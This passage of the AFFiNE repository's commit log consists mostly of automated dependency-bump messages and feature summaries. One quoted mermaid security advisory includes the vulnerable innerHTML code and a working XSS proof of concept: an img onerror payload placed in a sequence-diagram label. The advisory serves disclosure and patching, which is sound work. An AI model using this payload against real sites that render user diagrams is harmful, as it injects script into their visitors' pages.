href="https://github.com/browserify/sha.js/commit/35aec35c667b606b2495be3e4186bbe977b9e087"><code>35aec35</code></a></li> <li>[Tests] avoid console logs <a href="https://github.com/browserify/sha.js/commit/73e33ae0ca6bca232627cac7473028e1d218f67e"><code>73e33ae</code></a></li> <li>[Tests] fix tests run in batch <a href="https://github.com/browserify/sha.js/commit/262913006e94616c8cd245ef6bd61bc4410b29e3"><code>2629130</code></a></li> <li>[Tests] drop node requirement to 0.10 <a href="https://github.com/browserify/sha.js/commit/00c7f234aa3bdbd427ffeb929bacbb05334eb3e9"><code>00c7f23</code></a></li> <li>[Dev Deps] update <code>buffer</code>, <code>hash-test-vectors</code>, <code>standard</code>, <code>tape</code>, <code>typedarray</code> <a href="https://github.com/browserify/sha.js/commit/92b5de5f67472d9f18413d38ad5b9aba29ff4c22"><code>92b5de5</code></a></li> <li>[Tests] drop node requirement to v3 <a href="https://github.com/browserify/sha.js/commit/9b5eca80fd9bb21cf05bdf43ce42661f1bbafeaa"><code>9b5eca8</code></a></li> <li>[meta] set engines to <code>&gt;= 4</code> <a href="https://github.com/browserify/sha.js/commit/807084c5c0f943459e89838252cafbd175b549b7"><code>807084c</code></a></li> <li>Only apps should have lockfiles <a href="https://github.com/browserify/sha.js/commit/c72789c7a129cf453d44008ba27a88b90ac7989b"><code>c72789c</code></a></li> <li>[Deps] update <code>inherits</code>, <code>safe-buffer</code> <a href="https://github.com/browserify/sha.js/commit/5428cfc6f7177ad1a41c837b9387308848db96de"><code>5428cfc</code></a></li> <li>[Dev Deps] update <code>@ljharb/eslint-config</code> <a href="https://github.com/browserify/sha.js/commit/2dbe0aab419e90add5032c70c9663b8fc562adb8"><code>2dbe0aa</code></a></li> <li>update README to reflect LICENSE <a href="https://github.com/browserify/sha.js/commit/8938256dbb2241a7c749e4a399dbaff48cbe8e95"><code>8938256</code></a></li> <li>[Dev Deps] add missing peer dep <a href="https://github.com/browserify/sha.js/commit/d52889688ce524e63570f35e448635a29e6dd791"><code>d528896</code></a></li> <li>[Dev Deps] remove unused <code>buffer</code> dep <a href="https://github.com/browserify/sha.js/commit/94ca7247f467ef045f41d534708bf7c700e03828"><code>94ca724</code></a></li> </ul> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href="https://github.com/browserify/sha.js/commit/eb4ea2fd3da93d41e250f9ac8a1a133ce450e0a2"><code>eb4ea2f</code></a> v2.4.12</li> <li><a href="https://github.com/browserify/sha.js/commit/d8d77c0a729c99593e304047f9d4335b498fd9ed"><code>d8d77c0</code></a> [meta] reorder package.json</li> <li><a href="https://github.com/browserify/sha.js/commit/df9d521e16ddf55dc877c43c05706d43c057fad4"><code>df9d521</code></a> [eslint] fix package.json indentation</li> <li><a href="https://github.com/browserify/sha.js/commit/35aec35c667b606b2495be3e4186bbe977b9e087"><code>35aec35</code></a> [meta] add <code>npmignore</code></li> <li><a href="https://github.com/browserify/sha.js/commit/d52889688ce524e63570f35e448635a29e6dd791"><code>d528896</code></a> [Dev Deps] add missing peer dep</li> <li><a href="https://github.com/browserify/sha.js/commit/b46e7116ebeaa82f34bbf2d7494fff7ef46eab3e"><code>b46e711</code></a> [meta] add <code>auto-changelog</code></li> <li><a href="https://github.com/browserify/sha.js/commit/94ca7247f467ef045f41d534708bf7c700e03828"><code>94ca724</code></a> [Dev Deps] remove unused <code>buffer</code> dep</li> <li><a href="https://github.com/browserify/sha.js/commit/2dbe0aab419e90add5032c70c9663b8fc562adb8"><code>2dbe0aa</code></a> [Dev Deps] update <code>@ljharb/eslint-config</code></li> <li><a href="https://github.com/browserify/sha.js/commit/73e33ae0ca6bca232627cac7473028e1d218f67e"><code>73e33ae</code></a> [Tests] avoid console logs</li> <li><a href="https://github.com/browserify/sha.js/commit/f2a258e9f2d0fcd113bfbaa49706e1ac0d979ba5"><code>f2a258e</code></a> [Fix] support multi-byte wide typed arrays</li> <li>Additional commits viewable in <a href="https://github.com/crypto-browserify/sha.js/compare/v2.4.11...v2.4.12">compare view</a></li> </ul> </details> <details> <summary>Maintainer changes</summary> <p>This version was pushed to npm by <a href="https://www.npmjs.com/~ljharb">ljharb</a>, a new releaser for sha.js since your current version.</p> </details> <br /> [](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores) Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`. [//]: # (dependabot-automerge-start) [//]: # (dependabot-automerge-end) --- <details> <summary>Dependabot commands and options</summary> <br /> You can trigger Dependabot actions by commenting on this PR: - `@dependabot rebase` will rebase this PR - `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it - `@dependabot merge` will merge this PR after your CI passes on it - `@dependabot squash and merge` will squash and merge this PR after your CI passes on it - `@dependabot cancel merge` will cancel a previously requested merge and block automerging - `@dependabot reopen` will reopen this PR if it is closed - `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually - `@dependabot show <dependency name> ignore conditions` will show all of the ignore conditions of the specified dependency - `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/toeverything/AFFiNE/network/alerts). </details> Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> |
||
|
|
18faaa38a0 |
chore: bump up mermaid version to v10.9.4 [SECURITY] (#13518)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [mermaid](https://redirect.github.com/mermaid-js/mermaid) | [`10.9.3` -> `10.9.4`](https://renovatebot.com/diffs/npm/mermaid/10.9.3/10.9.4) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-54881](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-7rqq-prvp-x9jh) ### Summary In the default configuration of mermaid 11.9.0, user supplied input for sequence diagram labels is passed to `innerHTML` during calculation of element size, causing XSS. ### Details Sequence diagram node labels with KaTeX delimiters are passed through `calculateMathMLDimensions`. This method passes the full label to `innerHTML` which allows allows malicious users to inject arbitrary HTML and cause XSS when mermaid-js is used in it's default configuration (with KaTeX support enabled). The vulnerability lies here: ```ts export const calculateMathMLDimensions = async (text: string, config: MermaidConfig) => { text = await renderKatex(text, config); const divElem = document.createElement('div'); divElem.innerHTML = text; // XSS sink, text has not been sanitized. divElem.id = 'katex-temp'; divElem.style.visibility = 'hidden'; divElem.style.position = 'absolute'; divElem.style.top = '0'; const body = document.querySelector('body'); body?.insertAdjacentElement('beforeend', divElem); const dim = { width: divElem.clientWidth, height: divElem.clientHeight }; divElem.remove(); return dim; }; ``` The `calculateMathMLDimensions` method was introduced in 5c69e5fdb004a6d0a2abe97e23d26e223a059832 two years ago, which was released in [Mermaid 10.9.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.0). ### PoC Render the following diagram and observe the modified DOM. ``` sequenceDiagram participant A as Alice<img src="x" onerror="document.write(`xss on ${document.domain}`)">$$\\text{Alice}$$ A->>John: Hello John, how are you? Alice-)John: See you later! ``` Here is a PoC on mermaid.live: https://mermaid.live/edit#pako:eNpVUMtOwzAQ_BWzyoFKaRTyaFILiio4IK7ckA-1km1iKbaLY6spUf4dJ0AF68uOZ2dm7REqXSNQ6PHDoarwWfDGcMkUudaJGysqceLKkj3hPdl3osJ7IRvSm-qBwcCAaIXGaONRrSsnUdnobITF28PQ954lwXglai25UNNhxWAXBMyXxcGOi-3kL_5k79e73atuFSUv2HWazH1IWn0m3CC5aPf4b3p2WK--BW-4DJCOWzQ3TM0HQmiMqIFa4zAEicZv4iGMsw0D26JEBtS3NR656ywDpiYv869_11r-Ko12TQv0yLveI3eqfcjP111HUNVonrRTFuhdsVgAHWEAmuRxlG7SuEzKMi-yJAnhAjTLIk_EcbFJtuk2y9MphM8lM47KIp--AOZghtU ### Impact XSS on all sites that use mermaid and render user supplied diagrams without further sanitization. ### Remediation The value of the `text` argument for the `calculateMathMLDimensions` method needs to be sanitized before getting passed on to `innerHTML`. --- ### Release Notes <details> <summary>mermaid-js/mermaid (mermaid)</summary> ### [`v10.9.4`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.4) [Compare Source](https://redirect.github.com/mermaid-js/mermaid/compare/v10.9.3...v10.9.4) This release backports the fix for GHSA-7rqq-prvp-x9jh from [v11.10.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.10.0), preventing a potential XSS attack in labels in sequence diagrams. See: [`9d68517`](https://redirect.github.com/mermaid-js/mermaid/commit/9d685178d215f76be4d5e8fe47c64dd915274738) (on `main` branch) See: [`7509b06`](https://redirect.github.com/mermaid-js/mermaid/commit/7509b066f164353c26028d5dd366736bed52d0c7) (backported commit) **Full Changelog**: <https://github.com/mermaid-js/mermaid/compare/v10.9.3...v10.9.4> </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS44MS4yIiwidXBkYXRlZEluVmVyIjoiNDEuODIuNyIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
072557eba1 |
feat(server): adapt gpt5 (#13478)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - New Features - Added GPT-5 family and made GPT-5/-mini the new defaults for Copilot scenarios and prompts. - Bug Fixes - Improved streaming chunk formats and reasoning/text semantics, consistent attachment mediaType handling, and more reliable reranking via log-prob handling. - Refactor - Unified maxOutputTokens usage; removed per-call step caps and migrated several tools to a unified inputSchema shape. - Chores - Upgraded AI SDK dependencies and bumped an internal dependency version. - Tests - Updated mocks and tests to reference GPT-5 variants and new stream formats. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
678dc15365 |
feat(editor): add mermaid code preview (#13456)
<img width="971" height="681" alt="iShot_2025-08-10_14 29 01" src="https://github.com/user-attachments/assets/eff3e6d5-3129-42ac-aceb-994c18f675ab" /> <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Mermaid diagram previews for code blocks with interactive zoom, pan, and reset controls. * Improved rendering feedback with loading, error states, retry behavior, and fallback messaging. * **Chores** * Added Mermaid as a frontend dependency to enable diagram rendering. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: L-Sun <zover.v@gmail.com> |
||
|
|
07b9b4fb8d |
chore: use latest oxlint version (#13457)
oxlint-tsgolint install fails had been fixed see https://github.com/oxc-project/oxc/issues/12892 #### PR Dependency Tree * **PR #13457** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Updated the version range for a development dependency to allow for newer compatible releases. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
52a9c86219 |
feat(core): enable battery save mode for mobile (#13441)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Battery save mode is now enabled by default on mobile devices. * Users will see an updated, more detailed description for battery save mode. * Battery save mode can now be configured by all users, not just in certain builds. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
d2a73b6d4e |
fix(electron): disable runAsNode fuse (#13406)
fix AF-2781 #### PR Dependency Tree * **PR #13406** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Updated Electron app configuration to include an additional plugin for enhanced packaging options. * Added a new development dependency to support the updated configuration. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
37e859484d | fix: bump on-headers | ||
|
|
5cbcf6f907 |
feat(server): add fallback model and baseurl in schema (#13375)
fix AI-398 <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added support for specifying fallback models for multiple AI providers, enhancing reliability when primary models are unavailable. * Providers can now fetch and update their list of available models dynamically from external APIs. * Configuration options expanded to allow custom base URLs for certain providers. * **Bug Fixes** * Improved model selection logic to use fallback models if the requested model is not available online. * **Chores** * Updated backend dependencies to include authentication support for Google services. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
77950cfc1b |
feat(core): extract md & snapshot & attachments from selected (#13312)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit ## Summary by CodeRabbit * **New Features** * Enhanced extraction of selected content in the editor to include document snapshots, markdown summaries, and attachments for both edgeless and page modes. * Attachments related to selected content are now available in chat and input contexts, providing additional metadata. * Added utility to identify and retrieve selected attachments in editor content. * **Bug Fixes** * Improved consistency in attachment retrieval when extracting selected content. * **Chores** * Updated dependencies and workspace references to include new block suite components. <!-- end of auto-generated comment: release notes by coderabbit.ai --> > CLOSE AF-2770 |
||
|
|
8d889fc3c7 |
feat(server): basic mcp server (#13298)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Introduced a new endpoint for MCP (Model Context Protocol) server interaction under `/api/workspaces/:workspaceId/mcp`, enabling advanced document reading and search capabilities within workspaces. * Added support for semantic and keyword search tools, as well as document reading through the MCP server, with user access control and input validation. * **Improvements** * Enhanced metadata handling in semantic search results for improved clarity. * Streamlined internal imports and refactored utility functions for better maintainability. * **Chores** * Added a new SDK dependency to the backend server package. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
bd161c54b2 |
chore: bump form-data from 4.0.2 to 4.0.4 (#13342)
Bumps [form-data](https://github.com/form-data/form-data) from 4.0.2 to 4.0.4. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/form-data/form-data/releases">form-data's releases</a>.</em></p> <blockquote> <h2>v4.0.4</h2> <h2><a href="https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4">v4.0.4</a> - 2025-07-16</h2> <h3>Commits</h3> <ul> <li>[meta] add <code>auto-changelog</code> <a href="https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479"><code>811f682</code></a></li> <li>[Tests] handle predict-v8-randomness failures in node < 17 and node > 23 <a href="https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402"><code>1d11a76</code></a></li> <li>[Fix] Switch to using <code>crypto</code> random for boundary values <a href="https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0"><code>3d17230</code></a></li> <li>[Tests] fix linting errors <a href="https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a"><code>5e34080</code></a></li> <li>[meta] actually ensure the readme backup isn’t published <a href="https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef"><code>316c82b</code></a></li> <li>[Dev Deps] update <code>@ljharb/eslint-config</code> <a href="https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d"><code>58c25d7</code></a></li> <li>[meta] fix readme capitalization <a href="https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61"><code>2300ca1</code></a></li> </ul> <h2>v4.0.3</h2> <h2><a href="https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3">v4.0.3</a> - 2025-06-05</h2> <h3>Fixed</h3> <ul> <li>[Fix] <code>append</code>: avoid a crash on nullish values <a href="https://redirect.github.com/form-data/form-data/issues/577"><code>[#577](https://github.com/form-data/form-data/issues/577)</code></a></li> </ul> <h3>Commits</h3> <ul> <li>[eslint] use a shared config <a href="https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f"><code>426ba9a</code></a></li> <li>[eslint] fix some spacing issues <a href="https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939"><code>2094191</code></a></li> <li>[Refactor] use <code>hasown</code> <a href="https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa"><code>81ab41b</code></a></li> <li>[Fix] validate boundary type in <code>setBoundary()</code> method <a href="https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e"><code>8d8e469</code></a></li> <li>[Tests] add tests to check the behavior of <code>getBoundary</code> with non-strings <a href="https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995"><code>837b8a1</code></a></li> <li>[Dev Deps] remove unused deps <a href="https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e"><code>870e4e6</code></a></li> <li>[meta] remove local commit hooks <a href="https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e"><code>e6e83cc</code></a></li> <li>[Dev Deps] update <code>eslint</code> <a href="https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916"><code>4066fd6</code></a></li> <li>[meta] fix scripts to use prepublishOnly <a href="https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75"><code>c4bbb13</code></a></li> </ul> </blockquote> </details> <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/form-data/form-data/blob/master/CHANGELOG.md">form-data's changelog</a>.</em></p> <blockquote> <h2><a href="https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4">v4.0.4</a> - 2025-07-16</h2> <h3>Commits</h3> <ul> <li>[meta] add <code>auto-changelog</code> <a href="https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479"><code>811f682</code></a></li> <li>[Tests] handle predict-v8-randomness failures in node < 17 and node > 23 <a href="https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402"><code>1d11a76</code></a></li> <li>[Fix] Switch to using <code>crypto</code> random for boundary values <a href="https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0"><code>3d17230</code></a></li> <li>[Tests] fix linting errors <a href="https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a"><code>5e34080</code></a></li> <li>[meta] actually ensure the readme backup isn’t published <a href="https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef"><code>316c82b</code></a></li> <li>[Dev Deps] update <code>@ljharb/eslint-config</code> <a href="https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d"><code>58c25d7</code></a></li> <li>[meta] fix readme capitalization <a href="https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61"><code>2300ca1</code></a></li> </ul> <h2><a href="https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3">v4.0.3</a> - 2025-06-05</h2> <h3>Fixed</h3> <ul> <li>[Fix] <code>append</code>: avoid a crash on nullish values <a href="https://redirect.github.com/form-data/form-data/issues/577"><code>[#577](https://github.com/form-data/form-data/issues/577)</code></a></li> </ul> <h3>Commits</h3> <ul> <li>[eslint] use a shared config <a href="https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f"><code>426ba9a</code></a></li> <li>[eslint] fix some spacing issues <a href="https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939"><code>2094191</code></a></li> <li>[Refactor] use <code>hasown</code> <a href="https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa"><code>81ab41b</code></a></li> <li>[Fix] validate boundary type in <code>setBoundary()</code> method <a href="https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e"><code>8d8e469</code></a></li> <li>[Tests] add tests to check the behavior of <code>getBoundary</code> with non-strings <a href="https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995"><code>837b8a1</code></a></li> <li>[Dev Deps] remove unused deps <a href="https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e"><code>870e4e6</code></a></li> <li>[meta] remove local commit hooks <a href="https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e"><code>e6e83cc</code></a></li> <li>[Dev Deps] update <code>eslint</code> <a href="https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916"><code>4066fd6</code></a></li> <li>[meta] fix scripts to use prepublishOnly <a href="https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75"><code>c4bbb13</code></a></li> </ul> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href="https://github.com/form-data/form-data/commit/41996f5ac73a867046d48512cab62e64fc846dad"><code>41996f5</code></a> v4.0.4</li> <li><a href="https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef"><code>316c82b</code></a> [meta] actually ensure the readme backup isn’t published</li> <li><a href="https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61"><code>2300ca1</code></a> [meta] fix readme capitalization</li> <li><a href="https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479"><code>811f682</code></a> [meta] add <code>auto-changelog</code></li> <li><a href="https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a"><code>5e34080</code></a> [Tests] fix linting errors</li> <li><a href="https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402"><code>1d11a76</code></a> [Tests] handle predict-v8-randomness failures in node < 17 and node > 23</li> <li><a href="https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d"><code>58c25d7</code></a> [Dev Deps] update <code>@ljharb/eslint-config</code></li> <li><a href="https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0"><code>3d17230</code></a> [Fix] Switch to using <code>crypto</code> random for boundary values</li> <li><a href="https://github.com/form-data/form-data/commit/d8d67dc8ac79285154edf7d3f57dbab593b9a146"><code>d8d67dc</code></a> v4.0.3</li> <li><a href="https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e"><code>e6e83cc</code></a> [meta] remove local commit hooks</li> <li>Additional commits viewable in <a href="https://github.com/form-data/form-data/compare/v4.0.2...v4.0.4">compare view</a></li> </ul> </details> <br /> [](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores) Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`. [//]: # (dependabot-automerge-start) [//]: # (dependabot-automerge-end) --- <details> <summary>Dependabot commands and options</summary> <br /> You can trigger Dependabot actions by commenting on this PR: - `@dependabot rebase` will rebase this PR - `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it - `@dependabot merge` will merge this PR after your CI passes on it - `@dependabot squash and merge` will squash and merge this PR after your CI passes on it - `@dependabot cancel merge` will cancel a previously requested merge and block automerging - `@dependabot reopen` will reopen this PR if it is closed - `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually - `@dependabot show <dependency name> ignore conditions` will show all of the ignore conditions of the specified dependency - `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/toeverything/AFFiNE/network/alerts). </details> Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> |